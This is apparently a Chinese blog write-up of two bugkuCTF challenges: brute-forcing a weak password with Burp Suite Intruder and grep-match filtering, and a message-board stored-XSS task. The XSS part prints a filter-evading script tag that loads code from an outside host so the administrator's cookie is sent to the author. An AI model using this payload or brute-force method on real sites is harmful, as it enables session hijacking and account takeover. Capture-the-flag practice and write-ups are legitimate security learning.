bugkuCTF

有时间再说,持续更新

bp

提示:弱密码top1000?z???
在这里插入图片描述
首先,burpsuite—>Intruder—>Sniper爆破该密码,发现包长度都一致,爆破不成功。根据题目提示,字典应该是没有问题的,所以不考虑这个可能。

然后,查看返回包,显然如果密码正确,r.code的值就不会是bugku10000,根据返回包长度都一致,可以推断,r.code的值为10位

<script>
  var r = {code: 'bugku10000'}
  if(r.code == 'bugku10000'){
  	console.log('e');
	document.getElementById('d').innerHTML = "Wrong account or password!";
  }else{
      console.log('0');
      window.location.href = 'success.php?code='+r.code;
  }
</script>

下面需要做的就是过滤掉响应内容为{code: 'bugku10000'}的包
Burp-Intruder-options-Grep match加上这个内容即可。

留言板

xss平台直接搞个payload放进去,然后管理员会自己访问,cookie就传过来了,看样子是把()过滤成||,不用window.open()就好了。我用的payload:<sCRiPt sRC=//0x.ax/jP7G></sCrIpT>

在这里插入图片描述

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值